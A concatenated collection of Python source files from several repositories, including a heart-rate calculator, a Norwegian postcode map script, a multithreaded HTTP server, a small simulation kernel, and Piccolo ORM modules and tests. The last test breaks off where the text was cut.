(MHR/RHR) MHR = Maximum heart rate. This number is actually the number of beats over the number of minutes, or the number of beats in 20 seconds multiplied by 3. RHR = Resting heart rate. The number is also found by dividing beats by minute or number of beats in 20 seconds multiplied by three. """ # Return VO2 Max return round(15.3*((220-age)/resting_hr),2) def target_high(age, HRresting): return TargetHeartRate.karvonen(age, HRresting, 85) def target_low(age, HRresting): return TargetHeartRate.karvonen(age, HRresting, 50) def target_min(HRreserve,RHR): return HRreserve*0.5 +RHR target_avg = lambda x, y : (x+y)/2 def zoladz(age): """ An alternative to the Karvonen method is the Zoladz method, which derives exercise zones by subtracting values from HRmax: THR = HRmax − Adjuster ± 5 bpm Zone 1 Adjuster = 50 bpm Zone 2 Adjuster = 40 bpm Zone 3 Adjuster = 30 bpm Zone 4 Adjuster = 20 bpm Zone 5 Adjuster = 10 bpm """ adjuster= { 1 : 50, # Easy 2 : 40, # Easy but less 3 : 30, # Medium 4 : 20, # Medium but less 5 : 10 # Hard } # Heart Rate Max HRmax = 220 -int(age) # Get user input to select a zone selected_zone= int(input("Select Training Zone: ")) # Use List comprehension to check if selected zone is in the adjuster dict for key in adjuster: if key == selected_zone: THR= HRmax - int(adjuster[key]) return THR def yes_no(user_input): option= lambda x: x[0:1].lower() while True: choice= option(user_input) if choice=='y': # Return yes return 'yes' elif choice=='n': # Return no return 'no' else: # Return yes_no() function return yes_no(input("Continue? Y/n: ")) def main(): target_heart_rate_program_init() if yes_no(input("Would you like to continue? y/n: "))=="yes": runProgram = True while runProgram: restingHR= int(input("What is your resting heart rate? ")) age= int(input("How old are you? ")) target_high= TargetHeartRate.target_high(age, restingHR) target_low= TargetHeartRate.target_low(age, restingHR) intensity= int(input("What is your target intensity 50-85%? ")) for keys in intensity_dict.keys(): if intensity in keys: intensity_rating= intensity_dict[keys][::] targetBPM= TargetHeartRate.karvonen(age, restingHR, intensity) vo2max= TargetHeartRate.vo2_max(age, restingHR) target_high= TargetHeartRate.target_high(age, restingHR) target_low= TargetHeartRate.target_low(age, restingHR) print("""\nYour target heart rate is : {} bpm Intensity Level : {} Target High (85% of HRR) : {} bpm Target Low (50% of HRR) : {} bpm Vo2Max : {} ml/kg/min """.format(targetBPM, intensity_rating, target_high, target_low,vo2max)) if yes_no(input("Do another calculation? y/n: ")) == "yes": continue else: break return [targetBPM, intensity_rating, target_high, target_low,vo2max] # Program Starts Here if __name__ == "__main__": results= main() ```
{ "source": "0rkGrrr1/Exercises", "score": 4 }
#### File: Python/Norway post codes map/postcodes_map.py ```python import geopandas as gpd def plot_post_code_map(): """ Function processes raw data, extracts data from column POSTNUMMER, draws the map of given post codes, and prints all unique post codes to console. """ #Reading data set: norway_set = gpd.read_file('Basisdata_0000_Norge_25833_Postnummeromrader_SOSI_Postnummerområde_FLATE.shp') #Choosing essential columns: norway_set = norway_set[['POSTNUMMER', 'geometry']] #Drawing a map with outline of every postal code: norway_set.plot(figsize=(10, 10), column='POSTNUMMER', cmap='prism', edgecolor='black', linewidth=0.2) #Selecting unique postal codes for item in norway_set[['POSTNUMMER']][:-1]: uniquelist = norway_set[item].unique() #Displaying total count of unique postal codes print('Number of unique rows:') print(uniquelist.size) #Printing all unique post codes print('Unique post codes:') print(uniquelist.tolist()) plot_post_code_map() ```
{ "source": "0rShemesh/construct-editor", "score": 3 }
#### File: construct_editor/gallery/test_stringencodded.py ```python import construct as cs from . import GalleryItem from typing import Dict, Any ENCODDINGS = dict( ASCII="ascii", UTF8="utf8", UTF16="utf16", MANDARIN="gb2312", ARABIC="iso8859_6", RUSSIAN="iso8859_5", JAPANESE="shift_jis", PORTUGUESE="cp860", ) ENCODDINGS_NUMBER = dict([(key,number,) for number,(key,_) in enumerate(ENCODDINGS.items())]) def text_helper(encodding :str, text: str) -> bytes: return ENCODDINGS_NUMBER[encodding].to_bytes(1, "little") + text.encode(ENCODDINGS[encodding]) def generate_all_string_encodded() -> Dict[str, Any]: return dict([(key,cs.StringEncoded(cs.GreedyBytes, value),) for key,value in ENCODDINGS.items()]) constr = cs.Struct( "encodding" / cs.Enum(cs.Int8ub, **ENCODDINGS_NUMBER), "string" / cs.Switch( cs.this.encodding, cases=generate_all_string_encodded(), ), ) gallery_item = GalleryItem( construct=constr, example_binarys={ "English": text_helper("ASCII", "hello world"), "Mandarin" : text_helper("MANDARIN", "你好世界"), "HINDI" : text_helper("UTF8", "नमस्ते दुनिया"), "SPANISH" : text_helper("ASCII", "Hola Mundo"), "FRENCH" : text_helper("ASCII", "Bonjour le monde"), "ARABIC" : text_helper("ARABIC", "مرحبا بالعالم"), "RUSSIAN" : text_helper("RUSSIAN", "Привет мир"), "PORTUGUESE" : text_helper("PORTUGUESE", "<NAME>"), "INDONESIAN" : text_helper("ASCII", "Halo Dunia"), "JAPANESE" : text_helper("JAPANESE", "こんにちは世界"), "emoji": text_helper("UTF8", "🙋🏼🌎"), "Zeros": bytes(8), }, ) ```
{ "source": "0rtis/multithread-http-server", "score": 2 }
#### File: 0rtis/multithread-http-server/multithread_http_server.py ```python import socket import threading import time from http.server import HTTPServer import logging class MultiThreadHttpServer: def __init__(self, host, parallelism, http_handler_class, request_callback=None, log=None): """ :param host: host to bind. example: '127.0.0.1:80' :param parallelism: number of thread listener and backlog :param http_handler_class: the handler class extending BaseHTTPRequestHandler :param request_callback: callback on incoming request. This method can be accede in the HTTPHandler instance. Example: self.server.request_callback( 'GET', # specify http method self # pass the HTTPHandler instance ) """ self.host = host self.parallelism = parallelism self.http_handler_class = http_handler_class self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.request_callback = request_callback self.connection_handlers = [] self.stop_requested = False self.log = log def start(self, background=False): self.socket.bind(self.host) self.socket.listen(self.parallelism) if self.log is not None: self.log.debug("Creating "+str(self.parallelism)+" connection handler") for i in range(self.parallelism): ch = ConnectionHandler(self.socket, self.http_handler_class, self.request_callback) ch.start() self.connection_handlers.append(ch) if background: if self.log is not None: self.log.debug("Serving (background thread)") threading.Thread(target=self.__serve).start() else: if self.log is not None: self.log.debug("Serving (current thread)") self.__serve() def stop(self): self.stop_requested = True for ch in self.connection_handlers: ch.stop() def __serve(self): """ Serve until stop() is called. Blocking method :return: """ while not self.stop_requested: time.sleep(1) class ConnectionHandler(threading.Thread, HTTPServer): def __init__(self, sock, http_handler_class, request_callback=None): HTTPServer.__init__(self, sock.getsockname(), http_handler_class, False) self.socket = sock self.server_bind = self.server_close = lambda self: None self.HTTPHandler = http_handler_class self.request_callback = request_callback threading.Thread.__init__(self) self.daemon = True self.stop_requested = False def stop(self): self.stop_requested = True def run(self): """ Each thread process request forever""" self.serve_forever() def serve_forever(self): """ Handle requests until stopped """ while not self.stop_requested: self.handle_request() print("Finish" + str(threading.current_thread())) ```
{ "source": "0saurabh0/p1", "score": 3 }
#### File: p1/examples/counter.py ```python import time import satsim class CounterModel(satsim.Model): def __init__(self, name, description, parent): super().__init__(name, description, parent) self.counter = 0 self.count_entrypoint = satsim.EntryPoint("Increase Counter") self.count_entrypoint.execute = self.count self.reset_entrypoint = satsim.EntryPoint("Reset Counter") self.reset_entrypoint.execute = self.reset self.log_entrypoint = satsim.EntryPoint("Log Counter") self.log_entrypoint.execute = self.log_count self.log_time_entrypoint = satsim.EntryPoint("Log Time") self.log_time_entrypoint.execute = self.log_time def reset(self): print("Reset counter") self.counter = 0 def count(self): self.counter += 1 print("Increase counter. Value now:", self.counter) def log_count(self): print("Log counter:", self.counter) def log_time(self): time.sleep(3) print("Current time:", self.time_keeper.get_simulation_time()) def configure(self, logger, link_registry): if self._state != self.PUBLISHING: raise satsim.InvalidComponentState() self.logger = logger self.logger.log_info(self, "Counter Model is now configured") self._state = self.CONFIGURED def connect(self, simulator): if self._state != self.CONFIGURED: raise satsim.InvalidComponentState() self.simulator = simulator self.scheduler = simulator.get_scheduler() self.time_keeper = simulator.get_time_keeper() self.scheduler.add_simulation_time_event(self.log_time_entrypoint, 0, 1, 7) self.scheduler.add_simulation_time_event(self.count_entrypoint, 1) self.scheduler.add_simulation_time_event(self.log_entrypoint, 2, 1.5, 2) self.scheduler.add_simulation_time_event(self.reset_entrypoint, 3) self.logger.log_info(self, "Counter Model is now connected") self._state = self.CONNECTED # create simulator simulator = satsim.Simulator() # create model instance counter_model = CounterModel("Counter", "Counter Model", simulator) # add to models container simulator.add_model(counter_model) # simulator starting simulator.publish() simulator.configure() simulator.connect() simulator.initialise() print("Simulation started") simulator.run() # run for some time for i in range(10): print("Current event:", simulator.get_scheduler().get_current_event_id()) time.sleep(1) print("Simulation completed") simulator.exit() ``` #### File: satsim/kernel/collection.py ```python from satsim import Object class Collection(Object): def __init__(self): pass def collection_at(self, index_or_name): """ shall return the element with the given position or name, if no element exists with the given position or name, it returns None """ pass def collection_size(self): """ shall return the number of items in the collection """ pass ``` #### File: satsim/kernel/container.py ```python from satsim import Object class ContainerFull(Exception): pass class DuplicateName(Exception): pass class CannotDelete(Exception): pass class NotContained(Exception): pass class Container(Object): def __init__(self, name, description="", parent=None): super().__init__(name, description, parent) self.components = [] self.max_count = None self.min_count = None def get_component(self, name): for component in self.components: if component.name == name: return component else: return None def get_components(self): return self.components def add_component(self, component): if self.max_count is not None: if len(self.components) >= self.max_count: raise ContainerFull() for _component in self.components: if _component.name == component.name: raise DuplicateName() self.components.append(component) def get_count(self): return len(self.components) def get_upper(self): return self.max_count if self.max_count is not None else -1 def get_lower(self): return self.min_count if self.min_count is not None else -1 def delete_component(self, component): if self.min_count is not None: if len(self.components) <= self.min_count: raise CannotDelete() for _component in self.components: if _component.name == component.name: self.components.pop(component) return else: raise NotContained() ``` #### File: kernel/services/logger.py ```python from satsim import Service class Logger(Service): INFORMATION = "INFORMATION" EVENT = "EVENT" WARNING = "WARNING" ERROR = "ERROR" DEBUG = "DEBUG" def __init__(self, simulator): self._simulator = simulator def log(self, sender, message, kind=None): print("{} | {}".format(kind, message)) def log_info(self, sender, message): self.log(sender, message, kind=self.INFORMATION) def log_event(self, sender, message): self.log(sender, message, kind=self.EVENT) def log_warning(self, sender, message): self.log(sender, message, kind=self.WARNING) def log_error(self, sender, message): self.log(sender, message, kind=self.ERROR) def log_debug(self, sender, message): self.log(sender, message, kind=self.DEBUG) ```
{ "source": "0scarB/piccolo", "score": 2 }
#### File: app/commands/show_all.py ```python from piccolo.conf.apps import Finder def show_all(): """ Lists all registered Piccolo apps. """ app_registry = Finder().get_app_registry() print("Registered apps:") for app_path in app_registry.apps: print(app_path) ``` #### File: apps/migrations/tables.py ```python from __future__ import annotations import typing as t from piccolo.columns import Timestamp, Varchar from piccolo.columns.defaults.timestamp import TimestampNow from piccolo.table import Table class Migration(Table): name = Varchar(length=200) app_name = Varchar(length=200) ran_on = Timestamp(default=TimestampNow()) @classmethod async def get_migrations_which_ran( cls, app_name: t.Optional[str] = None ) -> t.List[str]: """ Returns the names of migrations which have already run, by inspecting the database. """ query = cls.select(cls.name, cls.ran_on).order_by(cls.ran_on) if app_name is not None: query = query.where(cls.app_name == app_name) return [i["name"] for i in await query.run()] ``` #### File: tester/commands/run.py ```python from __future__ import annotations import os import sys import typing as t from piccolo.table import TABLE_REGISTRY class set_env_var: def __init__(self, var_name: str, temp_value: str): """ Temporarily set an environment variable. :param var_name: The name of the environment variable to temporarily change. :temp_value: The value that the environment variable will temporarily be set to, before being reset to it's pre-existing value. """ self.var_name = var_name self.temp_value = temp_value def set_var(self, value: str): os.environ[self.var_name] = value def get_var(self) -> t.Optional[str]: return os.environ.get(self.var_name) def __enter__(self): self.existing_value = self.get_var() self.set_var(self.temp_value) def __exit__(self, *args): if self.existing_value is None: del os.environ[self.var_name] else: self.set_var(self.existing_value) def run_pytest(pytest_args: t.List[str]) -> int: # pragma: no cover try: import pytest except ImportError: sys.exit( "Couldn't find pytest. Please use `pip install 'piccolo[pytest]' " "to use this feature." ) return pytest.main(pytest_args) def refresh_db(): for table_class in TABLE_REGISTRY: # In case any table classes were imported before we set the # environment variable. table_class._meta.refresh_db() def run( pytest_args: str = "", piccolo_conf: str = "piccolo_conf_test" ) -> None: """ Run your unit test suite using Pytest. :param piccolo_conf: The piccolo_conf module to use when running your tests. This will contain the database settings you want to use. For example `my_folder.piccolo_conf_test`. :param pytest_args: Any options you want to pass to Pytest. For example `piccolo tester run --pytest_args="-s"`. """ with set_env_var(var_name="PICCOLO_CONF", temp_value=piccolo_conf): refresh_db() args = pytest_args.split(" ") sys.exit(run_pytest(args)) ``` #### File: user/piccolo_migrations/2020-06-11T21-38-55.py ```python from piccolo.apps.migrations.auto import MigrationManager ID = "2020-06-11T21:38:55" async def forwards(): manager = MigrationManager(migration_id=ID, app_name="user") manager.add_column( table_class_name="BaseUser", tablename="piccolo_user", column_name="first_name", column_class_name="Varchar", params={ "length": 255, "default": "", "null": True, "primary": False, "key": False, "unique": False, "index": False, }, ) manager.add_column( table_class_name="BaseUser", tablename="piccolo_user", column_name="last_name", column_class_name="Varchar", params={ "length": 255, "default": "", "null": True, "primary": False, "key": False, "unique": False, "index": False, }, ) return manager ``` #### File: columns/defaults/interval.py ```python from __future__ import annotations import datetime import typing as t from enum import Enum from .base import Default class IntervalCustom(Default): # lgtm [py/missing-equals] def __init__( self, weeks: int = 0, days: int = 0, hours: int = 0, minutes: int = 0, seconds: int = 0, milliseconds: int = 0, microseconds: int = 0, ): self.weeks = weeks self.days = days self.hours = hours self.minutes = minutes self.seconds = seconds self.milliseconds = milliseconds self.microseconds = microseconds @property def timedelta(self): return datetime.timedelta( weeks=self.weeks, days=self.days, hours=self.hours, minutes=self.minutes, seconds=self.seconds, milliseconds=self.milliseconds, microseconds=self.microseconds, ) @property def postgres(self): value = self.get_postgres_interval_string( attributes=[ "weeks", "days", "hours", "minutes", "seconds", "milliseconds", "microseconds", ] ) return f"'{value}'" @property def sqlite(self): return self.timedelta.total_seconds() def python(self): return self.timedelta @classmethod def from_timedelta(cls, instance: datetime.timedelta): return cls( days=instance.days, seconds=instance.seconds, microseconds=instance.microseconds, ) ############################################################################### IntervalArg = t.Union[ IntervalCustom, Enum, None, datetime.timedelta, ] __all__ = [ "IntervalArg", "IntervalCustom", ] ``` #### File: piccolo/columns/reference.py ```python from __future__ import annotations import importlib import inspect import typing as t from dataclasses import dataclass, field if t.TYPE_CHECKING: # pragma: no cover from piccolo.columns.column_types import ForeignKey from piccolo.table import Table @dataclass class LazyTableReference: """ Holds a reference to a ``Table`` subclass. Used to avoid circular dependencies in the ``references`` argument of ``ForeignKey`` columns. :param table_class_name: The name of the ``Table`` subclass. For example, 'Manager'. :param app_name: If specified, the ``Table`` subclass is imported from a Piccolo app with the given name. :param module_path: If specified, the ``Table`` subclass is imported from this path. For example, 'my_app.tables'. """ table_class_name: str app_name: t.Optional[str] = None module_path: t.Optional[str] = None def __post_init__(self): if self.app_name is None and self.module_path is None: raise ValueError( "You must specify either app_name or module_path." ) if self.app_name and self.module_path: raise ValueError( "Specify either app_name or module_path - not both." ) def resolve(self) -> t.Type[Table]: if self.app_name is not None: from piccolo.conf.apps import Finder finder = Finder() return finder.get_table_with_name( app_name=self.app_name, table_class_name=self.table_class_name ) if self.module_path: module = importlib.import_module(self.module_path) table: t.Optional[t.Type[Table]] = getattr( module, self.table_class_name, None ) from piccolo.table import Table if ( table is not None and inspect.isclass(table) and issubclass(table, Table) ): return table else: raise ValueError( f"Can't find a Table subclass called {self.app_name} " f"in {self.module_path}" ) raise ValueError("You must specify either app_name or module_path.") def __str__(self): if self.app_name: return f"App {self.app_name}.{self.table_class_name}" elif self.module_path: return f"Module {self.module_path}.{self.table_class_name}" else: return "Unknown" @dataclass class LazyColumnReferenceStore: foreign_key_columns: t.List[ForeignKey] = field(default_factory=list) def for_table(self, table: t.Type[Table]) -> t.List[ForeignKey]: return [ i for i in self.foreign_key_columns if isinstance(i._foreign_key_meta.references, LazyTableReference) and i._foreign_key_meta.references.resolve() is table ] def for_tablename(self, tablename: str) -> t.List[ForeignKey]: return [ i for i in self.foreign_key_columns if isinstance(i._foreign_key_meta.references, LazyTableReference) and i._foreign_key_meta.references.resolve()._meta.tablename == tablename ] LAZY_COLUMN_REFERENCES: LazyColumnReferenceStore = LazyColumnReferenceStore() ``` #### File: query/methods/objects.py ```python from __future__ import annotations import typing as t from dataclasses import dataclass from piccolo.columns.column_types import ForeignKey from piccolo.columns.combination import And, Where from piccolo.custom_types import Combinable from piccolo.engine.base import Batch from piccolo.query.base import Query from piccolo.query.mixins import ( LimitDelegate, OffsetDelegate, OrderByDelegate, OutputDelegate, PrefetchDelegate, WhereDelegate, ) from piccolo.querystring import QueryString from piccolo.utils.dictionary import make_nested from piccolo.utils.sync import run_sync from .select import Select if t.TYPE_CHECKING: # pragma: no cover from piccolo.columns import Column from piccolo.table import Table @dataclass class GetOrCreate: query: Objects where: Combinable defaults: t.Dict[t.Union[Column, str], t.Any] async def run(self): instance = await self.query.get(self.where).run() if instance: instance._was_created = False return instance instance = self.query.table() # If it's a complex `where`, there can be several column values to # extract e.g. (Band.name == 'Pythonistas') & (Band.popularity == 1000) if isinstance(self.where, Where): setattr( instance, self.where.column._meta.name, # type: ignore self.where.value, # type: ignore ) elif isinstance(self.where, And): for column, value in self.where.get_column_values().items(): if len(column._meta.call_chain) == 0: # Make sure we only set the value if the column belongs # to this table. setattr(instance, column._meta.name, value) for column, value in self.defaults.items(): if isinstance(column, str): column = instance._meta.get_column_by_name(column) setattr(instance, column._meta.name, value) await instance.save().run() instance._was_created = True return instance def __await__(self): """ If the user doesn't explicity call .run(), proxy to it as a convenience. """ return self.run().__await__() def run_sync(self): return run_sync(self.run()) def prefetch(self, *fk_columns) -> GetOrCreate: self.query.prefetch(*fk_columns) return self @dataclass class Create: query: Objects columns: t.Dict[str, t.Any] async def run(self): instance = self.query.table() for column, value in self.columns.items(): if isinstance(column, str): column = instance._meta.get_column_by_name(column) setattr(instance, column._meta.name, value) await instance.save().run() instance._was_created = True return instance def __await__(self): """ If the user doesn't explicity call .run(), proxy to it as a convenience. """ return self.run().__await__() def run_sync(self): return run_sync(self.run()) @dataclass class Objects(Query): """ Almost identical to select, except you have to select all fields, and table instances are returned, rather than just data. """ __slots__ = ( "nested", "limit_delegate", "offset_delegate", "order_by_delegate", "output_delegate", "prefetch_delegate", "where_delegate", ) def __init__( self, table: t.Type[Table], prefetch: t.Sequence[t.Union[ForeignKey, t.List[ForeignKey]]] = (), **kwargs, ): super().__init__(table, **kwargs) self.limit_delegate = LimitDelegate() self.offset_delegate = OffsetDelegate() self.order_by_delegate = OrderByDelegate() self.output_delegate = OutputDelegate() self.output_delegate._output.as_objects = True self.prefetch_delegate = PrefetchDelegate() self.prefetch(*prefetch) self.where_delegate = WhereDelegate() def output(self, load_json: bool = False) -> Objects: self.output_delegate.output( as_list=False, as_json=False, load_json=load_json ) return self def limit(self, number: int) -> Objects: self.limit_delegate.limit(number) return self def first(self) -> Objects: self.limit_delegate.first() return self def prefetch( self, *fk_columns: t.Union[ForeignKey, t.List[ForeignKey]] ) -> Objects: self.prefetch_delegate.prefetch(*fk_columns) return self def get(self, where: Combinable) -> Objects: self.where_delegate.where(where) self.limit_delegate.first() return self def offset(self, number: int) -> Objects: self.offset_delegate.offset(number) return self def get_or_create( self, where: Combinable, defaults: t.Dict[t.Union[Column, str], t.Any] = {}, ): return GetOrCreate(query=self, where=where, defaults=defaults) def create(self, **columns: t.Any): return Create(query=self, columns=columns) def order_by(self, *columns: Column, ascending=True) -> Objects: self.order_by_delegate.order_by(*columns, ascending=ascending) return self def where(self, *where: Combinable) -> Objects: self.where_delegate.where(*where) return self async def batch( self, batch_size: t.Optional[int] = None, **kwargs ) -> Batch: if batch_size: kwargs.update(batch_size=batch_size) return await self.table._meta.db.batch(self, **kwargs) async def response_handler(self, response): if self.limit_delegate._first: if len(response) == 0: return None if self.output_delegate._output.nested: return make_nested(response[0]) else: return response[0] elif self.output_delegate._output.nested: return [make_nested(i) for i in response] else: return response @property def default_querystrings(self) -> t.Sequence[QueryString]: select = Select(table=self.table) for attr in ( "limit_delegate", "where_delegate", "offset_delegate", "output_delegate", "order_by_delegate", ): setattr(select, attr, getattr(self, attr)) if self.prefetch_delegate.fk_columns: select.columns(*self.table.all_columns()) for fk in self.prefetch_delegate.fk_columns: if isinstance(fk, ForeignKey): select.columns(*fk.all_columns()) else: raise ValueError(f"{fk} doesn't seem to be a ForeignKey.") # Make sure that all intermediate objects are fully loaded. for parent_fk in fk._meta.call_chain: select.columns(*parent_fk.all_columns()) select.output_delegate.output(nested=True) return select.querystrings ``` #### File: piccolo/testing/model_builder.py ```python import json import typing as t from datetime import date, datetime, time, timedelta from decimal import Decimal from uuid import UUID from piccolo.columns.base import Column from piccolo.table import Table from piccolo.testing.random_builder import RandomBuilder from piccolo.utils.sync import run_sync class ModelBuilder: __DEFAULT_MAPPER: t.Dict[t.Type, t.Callable] = { bool: RandomBuilder.next_bool, bytes: RandomBuilder.next_bytes, date: RandomBuilder.next_date, datetime: RandomBuilder.next_datetime, float: RandomBuilder.next_float, int: RandomBuilder.next_int, str: RandomBuilder.next_str, time: RandomBuilder.next_time, timedelta: RandomBuilder.next_timedelta, UUID: RandomBuilder.next_uuid, } @classmethod async def build( cls, table_class: t.Type[Table], defaults: t.Dict[t.Union[Column, str], t.Any] = None, persist: bool = True, minimal: bool = False, ) -> Table: """ Build Table instance with random data and save async. This can build relationships, supported data types and parameters. :param table_class: Table class to randomize. Examples: manager = await ModelBuilder.build(Manager) manager = await ModelBuilder.build(Manager, name='Guido') manager = await ModelBuilder(persist=False).build(Manager) manager = await ModelBuilder(minimal=True).build(Manager) band = await ModelBuilder.build(Band, manager=manager) """ return await cls._build( table_class=table_class, defaults=defaults, persist=persist, minimal=minimal, ) @classmethod def build_sync( cls, table_class: t.Type[Table], defaults: t.Dict[t.Union[Column, str], t.Any] = None, persist: bool = True, minimal: bool = False, ) -> Table: """ Build Table instance with random data and save sync. This can build relationships, supported data types and parameters. :param table_class: Table class to randomize. Examples: manager = ModelBuilder.build_sync(Manager) manager = ModelBuilder.build_sync(Manager, name='Guido') manager = ModelBuilder(persist=False).build_sync(Manager) manager = ModelBuilder(minimal=True).build_sync(Manager) band = ModelBuilder.build_sync(Band, manager=manager) """ return run_sync( cls.build( table_class=table_class, defaults=defaults, persist=persist, minimal=minimal, ) ) @classmethod async def _build( cls, table_class: t.Type[Table], defaults: t.Dict[t.Union[Column, str], t.Any] = None, minimal: bool = False, persist: bool = True, ) -> Table: model = table_class() defaults = {} if not defaults else defaults for column, value in defaults.items(): if isinstance(column, str): column = model._meta.get_column_by_name(column) setattr(model, column._meta.name, value) for column in model._meta.columns: if column._meta.null and minimal: continue if column._meta.name in defaults: continue # Column value exists if "references" in column._meta.params and persist: reference_model = await cls._build( column._meta.params["references"], persist=True, ) random_value = getattr( reference_model, reference_model._meta.primary_key._meta.name, ) else: random_value = cls._randomize_attribute(column) setattr(model, column._meta.name, random_value) if persist: await model.save().run() return model @classmethod def _randomize_attribute(cls, column: Column) -> t.Any: """ Generate a random value for a column and apply formatting. :param column: Column class to randomize. """ if column.value_type == Decimal: precision, scale = column._meta.params["digits"] random_value = RandomBuilder.next_float( maximum=10 ** (precision - scale), scale=scale ) elif column._meta.choices: random_value = RandomBuilder.next_enum(column._meta.choices) else: random_value = cls.__DEFAULT_MAPPER[column.value_type]() if "length" in column._meta.params and isinstance(random_value, str): return random_value[: column._meta.params["length"]] elif column.column_type in ["JSON", "JSONB"]: return json.dumps(random_value) return random_value ``` #### File: 0scarB/piccolo/setup.py ```python import itertools import os import typing as t from setuptools import find_packages, setup from piccolo import __VERSION__ as VERSION directory = os.path.abspath(os.path.dirname(__file__)) extras = ["orjson", "playground", "postgres", "sqlite", "uvloop"] with open(os.path.join(directory, "README.md")) as f: LONG_DESCRIPTION = f.read() def parse_requirement(req_path: str) -> t.List[str]: """ Parse requirement file. Example: parse_requirement('requirements.txt') # requirements/requirements.txt parse_requirement('extras/playground.txt') # requirements/extras/playground.txt Returns: List[str]: list of requirements specified in the file. """ # noqa: E501 with open(os.path.join(directory, "requirements", req_path)) as f: contents = f.read() return [i.strip() for i in contents.strip().split("\n")] def extras_require() -> t.Dict[str, t.List[str]]: """ Parse requirements in requirements/extras directory """ extra_requirements = {} for extra in extras: extra_requirements[extra] = parse_requirement( os.path.join("extras", extra + ".txt") ) extra_requirements["all"] = [ i for i in itertools.chain.from_iterable(extra_requirements.values()) ] return extra_requirements setup( name="piccolo", version=VERSION, description=( "A fast, user friendly ORM and query builder which supports asyncio." ), long_description=LONG_DESCRIPTION, long_description_content_type="text/markdown", author="<NAME>", author_email="<EMAIL>", python_requires=">=3.7.0", url="https://github.com/piccolo-orm/piccolo", packages=find_packages(exclude=("tests",)), package_data={ "": [ "templates/*", "templates/**/*", "templates/**/**/*", "templates/**/**/**/*", ], "piccolo": ["py.typed"], }, install_requires=parse_requirement("requirements.txt"), extras_require=extras_require(), license="MIT", classifiers=[ "License :: OSI Approved :: MIT License", "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: Implementation :: CPython", "Framework :: AsyncIO", "Typing :: Typed", "Topic :: Database", ], entry_points={"console_scripts": ["piccolo = piccolo.main:main"]}, ) ``` #### File: fixtures/commands/test_shared.py ```python import datetime import decimal import uuid from unittest import TestCase from piccolo.apps.fixtures.commands.shared import ( FixtureConfig, create_pydantic_fixture_model, ) class TestShared(TestCase): def test_shared(self): pydantic_model = create_pydantic_fixture_model( fixture_configs=[ FixtureConfig( app_name="mega", table_class_names=["MegaTable", "SmallTable"], ) ] ) data = { "mega": { "SmallTable": [{"id": 1, "varchar_col": "Test"}], "MegaTable": [ { "id": 1, "bigint_col": 1, "boolean_col": True, "bytea_col": b"hello", "date_col": datetime.date(2021, 1, 1), "foreignkey_col": 1, "integer_col": 1, "interval_col": datetime.timedelta(seconds=10), "json_col": '{"a":1}', "jsonb_col": '{"a": 1}', "numeric_col": decimal.Decimal("1.10"), "real_col": 1.100000023841858, "smallint_col": 1, "text_col": "hello", "timestamp_col": datetime.datetime(2021, 1, 1, 0, 0), "timestamptz_col": datetime.datetime( 2021, 1, 1, 0, 0, tzinfo=datetime.timezone.utc ), "uuid_col": uuid.UUID( "12783854-c012-4c15-8183-8eecb46f2c4e" ), "varchar_col": "hello", "unique_col": "hello", "null_col": None, "not_null_col": "hello", } ], } } model = pydantic_model(**data) self.assertEqual(model.mega.SmallTable[0].id, 1) self.assertEqual(model.mega.MegaTable[0].id, 1) ``` #### File: migrations/commands/test_check.py ```python from unittest import TestCase from unittest.mock import MagicMock, patch from piccolo.apps.migrations.commands.check import CheckMigrationManager, check from piccolo.conf.apps import AppRegistry from piccolo.utils.sync import run_sync class TestCheckMigrationCommand(TestCase): @patch.object( CheckMigrationManager, "get_app_registry", ) def test_check_migrations(self, get_app_registry: MagicMock): get_app_registry.return_value = AppRegistry( apps=["piccolo.apps.user.piccolo_app"] ) # Make sure it runs without raising an exception: run_sync(check()) ``` #### File: tests/columns/test_jsonb.py ```python from unittest import TestCase from piccolo.columns.column_types import JSONB from piccolo.table import Table from ..base import postgres_only class MyTable(Table): json = JSONB() @postgres_only class TestJSONB(TestCase): def setUp(self): MyTable.create_table().run_sync() def tearDown(self): MyTable.alter().drop_table().run_sync() def test_json(self): """ Test storing a valid JSON string. """ row = MyTable(json='{"a": 1}') row.save().run_sync() self.assertEqual(row.json, '{"a": 1}') def test_arrow(self): """ Test using the arrow function to retrieve a subset of the JSON. """ MyTable(json='{"a": 1}').save().run_sync() row = MyTable.select(MyTable.json.arrow("a")).first().run_sync() self.assertEqual(row["?column?"], "1") def test_arrow_as_alias(self): """ Test using the arrow function to retrieve a subset of the JSON. """ MyTable(json='{"a": 1}').save().run_sync() row = ( MyTable.select(MyTable.json.arrow("a").as_alias("a")) .first() .run_sync() ) self.assertEqual(row["a"], "1") def test_arrow_where(self): """ Make sure the arrow function can be used within a WHERE clause. """ MyTable(json='{"a": 1}').save().run_sync() self.assertEqual( MyTable.count().where(MyTable.json.arrow("a") == "1").run_sync(), 1 ) self.assertEqual( MyTable.count().where(MyTable.json.arrow("a") == "2").run_sync(), 0 ) def test_arrow_first(self): """ Make sure the arrow function can be used with the first clause. """ MyTable.insert( MyTable(json='{"a": 1}'), MyTable(json='{"b": 2}'), ).run_sync() self.assertEqual( MyTable.select(MyTable.json.arrow("a").as_alias("json")) .first() .run_sync(), {"json": "1"}, ) ``` #### File: tests/columns/test_json.py ```python from unittest import TestCase from piccolo.columns.column_types import JSON from piccolo.table import Table class MyTable(Table): json = JSON() class MyTableDefault(Table): """ Test the different default types. """ json = JSON() json_str = JSON(default="{}") json_dict = JSON(default={}) json_list = JSON(default=[]) json_none = JSON(default=None, null=True) class TestJSONSave(TestCase): def setUp(self): MyTable.create_table().run_sync() def tearDown(self): MyTable.alter().drop_table().run_sync() def test_json_string(self): """ Test storing a valid JSON string. """ row = MyTable(json='{"a": 1}') row.save().run_sync() self.assertEqual( MyTable.select(MyTable.json) .first() .run_sync()["json"] .replace(" ", ""), '{"a":1}', ) def test_json_object(self): """ Test storing a valid JSON object. """ row = MyTable(json={"a": 1}) row.save().run_sync() self.assertEqual( MyTable.select(MyTable.json) .first() .run_sync()["json"] .replace(" ", ""), '{"a":1}', ) class TestJSONDefault(TestCase): def setUp(self): MyTableDefault.create_table().run_sync() def tearDown(self): MyTableDefault.alter().drop_table().run_sync() def test_json_default(self): row = MyTableDefault() row.save().run_sync() self.assertEqual(row.json, "{}") self.assertEqual(row.json_str, "{}") self.assertEqual(row.json_dict, 